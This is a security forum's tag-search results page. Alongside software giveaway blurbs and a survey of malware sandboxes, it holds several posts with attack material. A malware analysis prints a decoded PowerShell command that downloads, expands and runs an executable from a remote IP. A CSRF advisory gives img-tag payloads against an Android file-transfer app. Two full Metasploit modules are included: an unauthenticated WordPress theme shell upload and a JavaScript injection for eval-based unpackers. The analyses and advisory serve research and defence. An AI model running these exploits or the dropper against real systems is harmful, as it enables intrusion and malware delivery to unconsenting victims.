Jump to content

Search the Community

Showing results for tags 'file'.

  • Search By Tags

    Type tags separated by commas.

  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End

Last Updated

  • Start

    End

Filter by number of...

Joined

  • Start

    End

Group

Website URL

Yahoo

Jabber

Skype

Location

Interests

Biography

Location

Interests

Occupation

Found 79 results

  1. TheOne
    Product Description GiliSoft Video Converter is simply the best choice for your video conversion needs because it supports all the major file formats. Compatible with over 160 video formats, chances are we’ve got your desired output file format covered. To keep up with rapidly advancing technology, GiliSoft Video Converter adds new formats as they’re released! If you want to convert flash to video, merge or cut video, rotate video, GiliSoft Video Converter is your must choice. Exclusive Features of Video Converter: Convert Almost All Video Files Read almost all the popular video formats from Internet, digital camcorders, capture cards, etc. No external codecs needed. The supported video formats are: 3GP File ( *.3gp; *3g2 ), ASF File ( *.asf ), AVI File ( *.avi; *.divx ), FLV File ( *.flv ), M2TS File ( *.m2ts ), MOV File ( *.mov ), MP4 File ( *.mp4; *.m4v ), MPEG File ( *.mpeg; *.mpg; *.dat ), MKV File ( *.mkv ), RMVB File ( *.rmvb; *.rm ), TS File ( *.ts ), VOB File ( *.vob ), WMV File ( *.wmv ). Convert to Various Video Formats Convert video files on your PC to almost all popular video formats such as H.265, MP4.4K, MKW.4K, MPEG-4, DivX, Xvid, H.264, AVI, MKV, FLV, WMV, DPG, 3GP, etc. compatible with iPod / iPhone / iPad (The New iPad) / PSP / ZUNE / NDS / Xbox 360 / PS3, and other specific format supported by Cell Phone, Apple TV, PVP and PDA. Convert to Various Audio Formats Besides video conversion and audio conversion, GiliSoft Video Converter can also convert video to all audio formats such as MP3, MP4, M4A, WMA, WAV, AC3 and DTS, or extract audio from video. Support Various Devices There are more than 10 conversion modes to support various multimedia devices, such as iPod, iPhone, iPad (The New iPad), PSP, Zune, cell phone, PVP, PDA, NDS, Apple TV, Xbox 360, PS3, etc. And Video Converter will be constantly updated to support new devices. GPU Acceleration Transcoding Convert a video with outstanding quality and very fast speed. GiliSoft Video Converter provides hardware accelerated H.264 encoder and Nvidia® CUDA/NVENC H.264 encoder. Convert Flash SWF to Any Video Gilisoft Video Converter is the best option for Flash to Video Conversion. This powerful tool can easily convert Macromedia Flash SWF file to video or audio files. HTML5 Video Converter No matter what kind of format you have your videos in. It can convert multiple videos to an HTML5 compliant format (OGG, H264, WEBM). Support for HTML5 is improving all the time and videos will, in future, be easier to manage and stream. 4K Video Converter Gilisoft Video Converter is a comprehensive application that provides every type of conversion that you might need when you are working with 4K ultra high definition video files. Convert any format to 4K or Convert 4K videos to WMV, MOV, AVI and other formats. Merge Several Files into One & Trim Video File Merge several files or Clip your favorite sections of a video and merge them together. Cut off any video segment(s) of your choice. You also can get rid off advertisements, un-needed parts, etc. and customize your video to your exact needs. Edit, Enhance & Personalize your Videos Files Adjust brightness, saturation, and contrast, grayscale; Change aspect ratio, volume; Crop Video, rotate video; Add watermark to video; Add subtitle to video; Add special effects to video; -> Download <-Deal Expire in: EXPIRED!
  2. TheOne
    Product Description Losing important photos only happens when you don’t prepare well. It is really frustrating. Fortunately, we have Tenorshare Photo Recovery. It provides you a quick and efficient file recovery solution to recover photos, videos, audios and other files from computer and other storages devices, including SD card, digital camera, mobile phone, USB flash drive and more. Recover photos, as well as other files like videos, songs, emails, ZIP files, etc. Recover from hard drive and all portable devices Recover files lost due to any loss situation Preview before recovery and keep only the ones you need Recover Photos in Variety of Types Recover pictures in all popular formats, like JPG, PNG, PSD, GIF, RAW and etc. Get back lost photos shots by any camera brand, such as Cannon, Nikon, Sony, JVC, FujiFilm, and so on. Retrieve deleted photos on your Samsung, HTC, LG, Motorola, and other Android phone or Windows phone. Supports all memory cards, including SD card, CF card, XD card, and etc. All-inclusive File Recovery Besides photo recovery, this photo recovery software is capable of recovering videos, music, and other files like emails, archives, and much more. Recover files that you accidently deleted. Recover files from formatted, corrupted, or damaged partition or device. Preview before You Recover Preview photos in advance to confirm whether they are indeed your need. Pre-listen your lost music with a built-in audio player. Recover More Easily To filter file types for scanning help you restrict the scan to just the ones you need. It saves you a lot of time. It is flexible to pause or continue photo recovery during scanning. Support Wide File Systems It supports all file systems including HFS, HFS+, FAT, NTFS, EXT2, EXT3. Scan Faster Its unique algorithm eases the photo recovery scan and shortens scan time. Work on all Windows OS It supports the latest Windows 8.1, as well as Windows 8/7/XP/Vista. 100% Success Rate You can recover every file that was lost from your computer, or other medium. File Types Supported: Image JPG, BMP, TIFF (TIF), GIF, PNG, PSD CRW,CR2, NEF, ORF, RAF, SR2, MRW, DCR Video AVI, MP4, MOV, M4V, 3G2, 3GP, WMV, ASF, FLV Audio AIF ( AIFF), WAV, MP3, M4A, WMA, MID (MIDI) Document DOC/DOCX, XLS/XLSX, PPT/PPTX, PDF, CWK, HTML/HTM, INDD, EPS, etc. Email PST, DBX, EMLX, etc. Achieve IP, RAR, SIT, etc. File System Supported: HFS, HFS+, FAT, NTFS, EXT2, EXT3 Devices Supported: Memory card SD, CF, MMC(MultiMedia Card), XD Picture Card, SDHC, MicroSD, MiniSD, etc. External hard drive WD, Seagate, Maxtor, Hitachi, Samsung, etc Digital camera/camcorder Nikon, Canon, Kodak, Samsung, Sony, Panasonic, JVC, FujiFilm, etc. Cell Phones Samsung, HTC, Motorola, LG, BlackBerry, Sony Ericsson, Nokia, etc. Others Pen Drive, Floppy Disk, Zip Disk , USB Drive, Music Player, memory stick, etc. -> Download <-Deal Expire in: EXPIRED!
  3. TheOne
    Product Description Video to GIF is easy to use video to GIF converter with simple and friendly interface. Video to GIF well converts almost all popular video formats (such as AVI, MPEG, MP4, WMV, MKV, MOV, VOB, RMVB, etc) to not only animated GIF, but other commonly used image files (like JPG, BMP, TGA, PNG, TIF, etc). With ultrafast conversion speed and high quality, Video to GIF enables you to view animation as well as original video file easily. Video to GIF converter makes it possible for you to play video clips in GIF file. You can set 24 frame per second to get output GIF as same as original video or set 1 frame per second to get animated GIF with small size. What’s more, no plug-ins are required, you can publish the output GIF file on your web page by just using common HTML tag. Video to GIF is what exactly you desire. Convert video file like AVI, MPEG, MKV, MP4, WMV, MOV, and RM to animated GIF file. Keep original speed rate and resolution. Extract all frames of a video file into separate image files with ease. Images captured can be converted to all popular formats, such as JPG, GIF, BMP, PNG, etc. Add special effects (like Blue, Sharpen, Noise, Brighten, Invert, etc) to output GIF or other images. Convert video to GIF animation and other various image formats, including still GIF, JPEG, JPG, BMP, PNG, TGA, TIFF, ICO, and PCX. Adjust output rate. User can change the value of output rate (how many pictures per second) to control speed rate, which cannot be seen in other similar programs Convert video to a single image include multi-pictures with simple arrangement. Get output image file as same as original resolution or set a new size that you want. Video to GIF can be used as a video player with commonly used functions, like pause, stop, snapshot, etc. What’s more, it well supports all key video formats. -> Download <-Deal Expires in: EXPIRED!
  4. Aerosol
    Introduction Yesterday I received in my company inbox an email with an attached .xlsm file named D92724446.xlsm coming from Clare588@78-83-77-53.spectrumnet.bg. Central and local AV engines did not find anything malicious, and a multiengine scan got 0/57 as result. I decided to investigate a little more in-depth in order to confirm that was a malicious file and to extract at least the code I was imagining being inside this document. General Information This is some general info collected: Name: D92724446.xlsm MD5: fea3ab857813c0d65cd0b6b6233a834b SHA1: 64eef048efe86fe35f673fd2d853a8a727934e6c SHA256: 75e3a4cd45c08ff242e2927fa3b4ee80858073a202dade84898040bfbb7847ef ssdeep 768:qEIo/BPRS5t1dbQjlshORhynxvWXLUYJdGnSCk:qIJM8jl6nIP File size: 36.1 KB ( 36978 bytes ) File type: Office Open XML Spreadsheet Virus Total information: First submission: 2015-02-18 10:35:06 UTC Last submission: 2015-02-19 08:58:57 UTC Others names: 93D9B24583.xlsm e94fcc43b0dc9c7eb350149b4ebdfd3d 61a47fa44dd55f5721ebe85aa83a32e6 I233185_486.xlsm L335966_246.xlsm 271269885.xlsm 4501B81210.xlsm e65fb3285617c7b4bbc833a466be6c42 5312970.xlsm 9D50B4390.xlsm DDE1368393.xlsm E30178611.xlsm 43c29faad6fc5984273afcc67593d802 FE731885.xlsm C47394.xlsm suspect.xls 090214399.xlsm Q884674_740.xlsm E015272_266.xlsm U506714_083.xlsm 43925982.xlsm 8BB4D89313.xlsm.zip 82AC485705.xlsm 8abb99eb6078b658e05aece79337378a 0BF2034112.xlsm Static Analysis I started my analysis having a quick look inside: At offset 0 we can quickly view 4 bytes that confirm the format of the file (50 4B 03 04). At this point, I tried to get more information and to see how this document was composed: This quickly confirm my first suspicions. At offset 0x000012f1 a .bin file is found. Going a little ahead, we can try to get the code of these instructions: The code has been extracted, and different files for Classes and Modules have been created under \OfficeMalScanner\VBAPROJECT.BIN-Macros. Opening these files with a simple text editor, I immediately found many obfuscated instructions, as reported in the image below: However, after a quick analysis I realized that the modules really important for extracting of the malicious code were numbers 11 and 14. This is because the module number 11 contains the instructions for running the obfuscated code assigned to the variable named “FfdsfF” and de-obfuscated through the function call “NewQkeTzIIHM”. “NewQkeTzIIHM” takes one parameter in input as string and returns a string. These are its main instructions: The -13 immediately brings to mind a de-obfuscation loop which employs the rot13 algorithm. At this point, I simply wrote few lines of vbs code to correctly extract the content and print it to a txt file called output.txt. Function WriteFile(sText) Set objFSO = CreateObject("Scripting.FileSystemObject") Set objMyFile = objFSO.OpenTextFile( "C:\Users\EOSec\Desktop\output.txt", 8, true, 0 ) objMyFile.WriteLine(sText) objMyFile.close() End Function Dim i,x,y x = "pzq-<X-]|„r`uryy;r…r-5[r„:\owrp-`†€rz;[r;droPyvr{6;Q|„{y|nqSvyr54u}G<<B;>FC;?A@;D<x„rsr„rs<stq€rr<q…‡~;w}t4942aRZ]2iWV\v|qsuv|VU;pno46H-r…}n{q-2aRZ]2iWV\v|qsuv|VU;pno-2aRZ]2iWV\v|qsuv|VU;r…rH-€n-2aRZ]2iWV\v|qsuv|VU;r…rH" For i = 1 To Len(x) y = y + Chr(Asc(Mid(x, i, 1)) - 13) Next WriteFile(y) This is the clear code obtained: cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://5.196.243.7/kwefewef/fgdsee/dxzq.jpg','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe; And this the whois of the remote IP: inetnum 5.196.243.0 – 5.196.243.7 netname Just_Hosting country IE descr Just Hosting admin-c OTC9-RIPE tech-c OTC9-RIPE status ASSIGNED PA mnt-by OVH-MNT source RIPE # Filtered A file named dxzq.jpg is downloaded. It’s really a CAB file (JIOiodfhioIH.cab) that is then expanded to JIOiodfhioIH.exe and run. Source
  5. Aerosol
    Document Title: =============== Wireless File Transfer Pro Android - CSRF Vulnerabilities References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1437 Release Date: ============= 2015-02-25 Vulnerability Laboratory ID (VL-ID): ==================================== 1437 Common Vulnerability Scoring System: ==================================== 2.3 Product & Service Introduction: =============================== Wireless File Transfer Pro is the advanced version of Wireless File Transfer. (Copy of the Vendor Homepage: https://play.google.com/store/apps/details?id=com.lextel.WirelessFileTransferPro ) Abstract Advisory Information: ============================== An independent vulnerability laboratory researcher discovered multiple cross site request forgery web vulnerabilities in the Wireless File Transfer Pro v1.0.1 mobile android application. Vulnerability Disclosure Timeline: ================================== 2015-02-25: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Lextel Technology Product: Wireless File Transfer Pro - (Android) Web Application UI 5.9.5 - 1.0.1 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ Multiple cross site request forgery issues has been discovered in the Wireless File Transfer Pro 1.0.1 android mobile web-application. The mobile web-application is vulnerable to a combination of cross site request forgery and local command injection attacks. Proof of Concept (PoC): ======================= The vulnerabilities can be exploited by remote attackers without privileged application user account and with medium user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. Create New Folder <img src="http://192.168.1.2:8888/fileExplorer.html?action=create&type=folder&folderName=test1" width="0" height="0" border="0"> --- PoC Session Logs [GET] (Execution) --- GET /fileExplorer.html?action=create&type=folder&folderName=test1 HTTP/1.1 Host: 192.168.1.2:8888 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard Connection: keep-alive HTTP/1.1 200 OK Cache-control: no-cache Content-length: 4 <a href="#" onclick="actionBrower('/sdcard/test1')">test1</a></td></td><td width="24%"></td><td width="24%">2015-02-09 18:12:19</td><td width="15%"> Delete File, Folder <img src="http://192.168.1.2:8888/fileExplorer.html?action=deleteFile&fileName=test""width="0" height="0" border="0"> --- PoC Session Logs [GET] (Execution) --- GET /fileExplorer.html?action=deleteFile&fileName=test HTTP/1.1 Host: 192.168.1.2:8888 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard Connection: keep-alive HTTP/1.1 200 OK Cache-control: no-cache Content-length: 30 Reference: http://localhost:8888/ Security Risk: ============== The security risk of the cross site request forgery web vulnerability in the create and delete function is estimated as medium. (CVSS 2.3) Credits & Authors: ================== Hadji Samir [s-dz@hotmail.fr] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source
  6. Aerosol
    ## # This module requires Metasploit: http://www.metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'socket' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper include Msf::HTTP::Wordpress def initialize(info = {}) super(update_info( info, 'Name' => 'WordPress Holding Pattern Theme Arbitrary File Upload', 'Description' => %q{ This module exploits a file upload vulnerability in all versions of the Holding Pattern theme found in the upload_file.php script which contains no session or file validation. It allows unauthenticated users to upload files of any type and subsequently execute PHP scripts in the context of the web server. }, 'License' => MSF_LICENSE, 'Author' => [ 'Alexander Borg', # Vulnerability disclosure 'Rob Carr <rob[at]rastating.com>' # Metasploit module ], 'References' => [ ['CVE', '2015-1172'], ['WPVDB', '7784'], ['URL', 'http://packetstormsecurity.com/files/130282/WordPress-Holding-Pattern-0.6-Shell-Upload.html'] ], 'DisclosureDate' => 'Feb 11 2015', 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['holding_pattern', {}]], 'DefaultTarget' => 0 )) end def rhost datastore['RHOST'] end def holding_pattern_uploads_url normalize_uri(wordpress_url_themes, 'holding_pattern', 'uploads/') end def holding_pattern_uploader_url normalize_uri(wordpress_url_themes, 'holding_pattern', 'admin', 'upload-file.php') end def generate_mime_message(payload, payload_name) data = Rex::MIME::Message.new target_ip = IPSocket.getaddress(rhost) field_name = Rex::Text.md5(target_ip) data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"#{field_name}\"; filename=\"#{payload_name}\"") data end def exploit print_status("#{peer} - Preparing payload...") payload_name = "#{Rex::Text.rand_text_alpha(10)}.php" data = generate_mime_message(payload, payload_name) print_status("#{peer} - Uploading payload...") res = send_request_cgi( 'method' => 'POST', 'uri' => holding_pattern_uploader_url, 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => data.to_s ) fail_with(Failure::Unreachable, 'No response from the target') if res.nil? fail_with(Failure::UnexpectedReply, "Server responded with status code #{res.code}") if res.code != 200 payload_url = normalize_uri(holding_pattern_uploads_url, payload_name) print_status("#{peer} - Executing the payload at #{payload_url}") register_files_for_cleanup(payload_name) send_request_cgi({ 'uri' => payload_url, 'method' => 'GET' }, 5) end end Source
  7. Aerosol
    In this section, we’re providing a list of cloud automated online malware analysis tools that are not available anymore due to the website being offline or the service being disrupted by the creators of the analysis environment. Aerie : https://aerie.cs.berkeley.edu CWSandbox : The Sandbox | Understanding CyberForensics ThreatTrack : http://www.treattrack.com Malbox : Malbox System VisualThreat : http://www.visualthreat.com XecScan : http://scan.xecure-lab.com Norman Sandbox : https://www.norman.com/analysis Despite quite a few analysis tools being unavailable, there are still a lot of them being actively supported and developed. The online malware analysis tools that are still present on the Internet are presented below. Each of the tools has a letter written in square brackets, which is used later on to present each of the tools in a table in order to preserve space and provide clearer results. Each of the tools also has an URL address of where the service is available in case you want to submit different files for analysis. [A] Anubis : http://anubis.iseclab.org [C] Comodo : http://camas.comodo.com [D] Document Analyzer : http://www.document-analyzer.net [E] Eureka : http://eureka.cyber-ta.org [J] Joe Sandbox : http://www.joesecurity.org [M] Malwr : https://malwr.com/submission [MS] Mobile Sandbox : http://mobilesandbox.org [TE] Threat Expert : http://www.threatexpert.com/submit.aspx [TT] Threat Track : http://www.threattracksecurity.com/resources/sandbox-malware-analysis.aspx [V] Vicheck : https://www.vicheck.ca [X] Xandora : http://www.xandora.net/xangui Note that there are other cloud malware analysis platforms, but we didn’t take them info consideration in this article. Therefore, some of them are not presented and described below. Supported file formats and document types Since malware can be hidden in almost any file format or document type, malware analysis tools must provide support for such formats or document types in order to be able to detect the threat inside it. For example: if an attacker has hidden a malicious payload inside a PDF document, the malware analysis tool must have PDF support to be able to manipulate with PDF documents. If PDF support is not present, the dissection of PDF document will not be possible, and consequentially the tool will not be able to find malicious payload. If we look at the PDF document through the eyes of a malware analyst tool, the PDF document is just a set of random bytes. The attackers mostly use the file formats, document types and other elements presented below for including malicious payloads. The majority of presented elements need no further introduction, since they are used in our every day lives, but we will still provide a brief explanation of each of them. exe: Windows PE executable files normally used for Windows executable programs. elf: Linux ELF executable files normally used for Linux executable programs. mach-o: MAC OS X Mach-O executable files normally used for Mac executable programs. apk: Android APK executable files url: URLs pdf: PDF documents doc/docx: DOC/DOCX documents ppt/pptx: PPT/PPTX documents xsl/xsls: XSL/XSLS documents htm/html: HTM/HTML web pages jar: JAR Java executable files rtf: RTF documents dll: DLL libraries db: DB database files png/jpg: PNG/JPG images zip/rar: ZIP/RAR archived cpl: Control Panel Applets ie: Analyze Internet Explorer process when opening an URL ps1: Powershell scripts python : Python scripts vbs: VBScript files The table below presents supported file formats and document types of each cloud automated malware analysis service. The rows represent file formats or document types, while the columns are used for each of the automated malware analysis tools presented by one or two letters (as presented before). The ?is used to denote that certain file format or document type is supported by an automated malware analysis service, while an empty cell indicates otherwise. The * is used to mark that the support for document type is being implemented, but not yet available, at the time of this writing. Table 1: supported document types by different malware analysis tools Document Type A C D E J M MS TE TT V X exe ? ? ? ? ? ? ? elf * mach-o ? apk ? ? ? url ? ? pdf ? ? ? ? doc/docx ? ? ? ? ppt/pptx ? ? ? xsl/xsls ? ? ? ? rtf ? htm/html ? ? jar ? ? dll ? ? db ? png/jpg ? zip/rar ? ? cpl ? ie ? ps1 ? python ? vbs ? I’ve spent quite some time putting together the table above, which summarized the supported file formats, document types and other kind of elements that can be analyzed in automated fashion. From the table, we can quickly determine that there isn’t a service that can be used to analyze any kind of file, which is because the malicious code is included in files and documents in a profoundly different manner. When adding a malicious code in executable file, we can do so by including malicious assembly instructions in its .text file section – and that is only one of the ways of doing it. On the other hand, when including a malicious code in a .docx document, we usually include it in a form of a malicious macro, which will get executed by Microsoft Word upon opening the document. Below we’ve presented different categories of categorizing the file formats, document types and other elements presented in the table above. In each of the categories we’ll also briefly discuss how the malicious code gets executed and what is needed for cloud automated malware analysis of such code. Executable Files [exe, elf, mach-o, apk, dll]: a malicious executable file is distributed around the Internet, which is downloaded by users in the form of cracked software programs and cracked games. The users download a program believing to be something they want, which it is, but an additional code is usually appended to the file containing a malicious payload that gets executed on the user’s computer and therefore infecting it. Documents [pdf, doc/docx, ppt/pptx, xsl/xsls, rtf]: vulnerabilities are discovered in different software programs on a daily basis. Therefore, if an attackers finds a vulnerability in an Acrobat Reader (supports pdf file format), Microsoft Word/OpenOffice (supports doc/docx, ppt/pptx, xsl/xslx, rtf), it can form such a document that the program won’t be able to process the file, but will crash instead. Depending on the type of vulnerability, an attacker can possibly execute a malicious payload included in the document. Web browser [url, htm/html, jar, ie]: web browsers also contain vulnerabilities as PDF Reader and Office Suite do. Therefore, an attacker can create a malicious website the web browser will not able to handle, which will lead to the web browser crashing, during which an attacker can execute arbitrary code. Archives [zip/rar]: archives can be used to distribute malicious files around the Internet. If a malicious file is put inside a password protected archive, the usual analysis solutions won’t be able to take a look inside the archive and determine whether it contains malicious files. Images [png/jpg]: an attacker can hide a malicious payload inside an image, which can be processed by a vulnerable web application running on an incorrectly setup web server. Therefore, an analysis solution should be able to parse various image file formats in order to parse images to determine whether they contain anything out of the ordinary, like a malicious payload. Code (python, vbs, ps1) : an attacker can also distribute malicious code written in appropriate programming/scripting language, which is later processed by some application on the victim’s machine. An example of such is PowerShell (ps1) macro included in a Word document, which gets executed on a user’s request when allowing the execution of macros upon opening a malicious .docx document in Microsoft Word. Techniques for Detecting Automated Environments Various techniques exist for detecting automated malware analysis environments, which are being incorporated in malware samples. When malware binaries are using different checks to determine whether they are executing in a controlled environment, they usually don’t execute malicious actions upon environment detection. The picture below presents an overview of malware and techniques it can use to detect if it’s being executed in an automated environment. In order to make the picture clearer, we’ll describe the process in detail. Once the malware has infected the system, it can be running in user or kernel-mode, depending upon the exploitation techniques. Usually malware is running in user-mode, but there are multiple techniques for malware to gain additional privileges to execute in kernel-mode. Despite malware being executed in either user or kernel-mode, there are multiple techniques malware can use to detect if it’s being executed in automated malware analysis environment. At the highest level, the techniques are divided into the following categories: Detect a Debugger: debuggers are mostly used when a malware analyst is manually inspecting a malware sample in order to gain understanding of what it does. Debuggers are not frequently used in automated malware analysis, but different techniques can still be incorporated into the malware sample to make debugging the malware sample more difficult. Anti-Disassembly Tricks: this category isn’t directly related to automated malware analysis environments, but when an analyst is manually reviewing the malware sample in a debugger, malware can use different techniques to confuse disassembly engines into producing incorrect disassembled code. This is only useful when a malware analyst is analyzing the malware sample manually, but doesn’t have much impact in automated malware analysis environments. Detect a Sandbox Environment: a sandbox is an environment separate from the main operating system where malware samples can be run without causing any harm to the rest of the system. The primary purpose of sandbox environment is to emulate different parts of the system, or the whole system to separate the guest system from the host system. Depending on the virtualization layer, there are different types of sandboxes, which are presented below. Virtualized Programs: Chromium Sandbox, Sandboxie Linux Containers: LXC, Docker Virtualized Environment: VirtualPC, VMware, VirtualBox, QEMU Each automated malware analysis tool uses different backend systems to run the malware in a controlled environment. Malware can be run in physical machines or virtual machines. Note that old unused physical machines lying around at home would be a perfect candidate for setting up a malware analysis lab, which would make it considerably more difficult for malware binaries to determine whether they are being executed in a controlled environment. When building our own malware analysis lab, we have to connect multiple machines together to form a network, which can be done simply by virtual or physical switch, depending on the type of machines used. Each cloud automated malware analysis services uses some kind of virtualization environment to run their malware samples, like Qemu/KVM, VirtualBox, VMWare, etc. According to the virtualization technology being used, a malware sample can use different techniques to detect that it’s being analyzed and terminate immediately. Thus the malware sample will not be flagged as malicious, since it terminated preemptively without execution the malicious code. In this section we’ve seen that different cloud malware analysis services use different virtualization technologies to run submitted malware samples. As far as I know, only Joe Sandbox has an option of running malware samples on actual physical machines, which prevents certain techniques from being used in malware samples to detect if they are being run in an automated malware analysis environment. Still, there are many other techniques a malware can use to detect if it’s being analyzed. This is a cat and mouse game, where new detection techniques are invented and used by malware samples on a daily basis. On the other hand, there are numerous anti-detection techniques used to prevent the malware from determining it’s being executed in an automated malware analysis environment. When a new detection technique appears, usually a new anti-detection technique is put together to render the detection technique useless. Conclusion In this article we’ve presented the differences between multiple cloud malware analysis services that can be used to analyze different file formats and document types. Each service supports only a fraction of all file formats and document types in which malicious code can be injected. Therefore, depending on the file we have to analyze, we can use the services that support its corresponding file format or document type. In order to analyze a document, we have to choose the appropriate service in order to do so. Since there are many techniques an attacker can use to determine whether the malicious payload is being executed in an automated malware analysis environment, some malicious samples won’t be analyzed correctly, resulting in false positives. Therefore, such services should only be used together with a reverse engineer or malware analyst in order to manually determine whether the file is malicious or not. Since there are many malicious samples distributed around the Internet on a daily basis, every sample cannot be manually inspected, which is why cloud automated malware analysis services are a great way to speed up the analysis. Source
  8. Aerosol
    ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'msf/core/exploit/jsobfu' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::JSObfu def initialize(info = {}) super(update_info(info, 'Name' => 'Javascript Injection for Eval-based Unpackers', 'Description' => %q{ This module generates a Javascript file that executes arbitrary code when an eval-based unpacker is run on it. Works against js-beautify's P_A_C_K_E_R unpacker. }, 'Author' => [ 'joev' ], 'License' => MSF_LICENSE, 'References' => [ ], 'Platform' => 'nodejs', 'Arch' => ARCH_NODEJS, 'Privileged' => false, 'Targets' => [['Automatic', {}]], 'DisclosureDate' => 'Feb 18 2015', 'DefaultTarget' => 0)) register_options([ OptString.new('FILENAME', [true, 'The file name.', 'msf.js']), OptString.new('CUSTOM_JS', [false, 'Custom Javascript payload.']) ], self.class) end def exploit p = js_obfuscate(datastore['CUSTOM_JS'] || payload.encoded); print_status("Creating '#{datastore['FILENAME']}' file...") file_create("eval(function(p,a,c,k,e,r){}((function(){ #{p} })(),''.split('|'),0,{}))") end end Source
  9. TheOne
    Product Description Get organized automatically Don’t spend time hunting down and organizing your files manually! Ashampoo Media Sync scans, identifies and organizes your media for you into categories (Documents, Music, Pictures, Video) – automatically. Files instantly organized No more file chaos! Just plug in your device. MediaSync will do the rest! Setting up takes only seconds Select input location. Select output location. Select file types. Done! Compatible with all autoplay-enabled devices CDs, DVDs, flash drives, smartphones, digital cameras and more. You name it, MediaSync supports it! The application consists of three main steps which you have to follow in order to sort your files. The first enables you to choose the source folder and the file category you want to sync (images, music, videos, documents), the second allows you to select the destination path and the third simply gives the all clear signal for the entire process. Ashampoo Media Sync can be used to synchronize content between mobile phones, tablets, external drives and so on, which makes it handy for scenarios in which you made a mess of things by copying stuff to the aforementioned devices without giving too much thought to sorting. Features: – Syncing happens in the background – Folder structures are preserved – File types are automatically recognized, files get organized into four categories (Documents, Music, Pictures, Video) – All auto-play-enabled devices are supported (CD, DVD, flash drives, smartphones, digital cameras and more) With Ashampoo Media Sync, organizing files is as easy as 1, 2, 3! 1. Select input location 2. Select output location 3. Select file types Ashampoo Media Sync will scan, identify and organize your media into categories for you (Documents, Music, Pictures, Video) – automatically, every time. -> Download <-Deal Expires in: EXPIRED!
  10. Aerosol
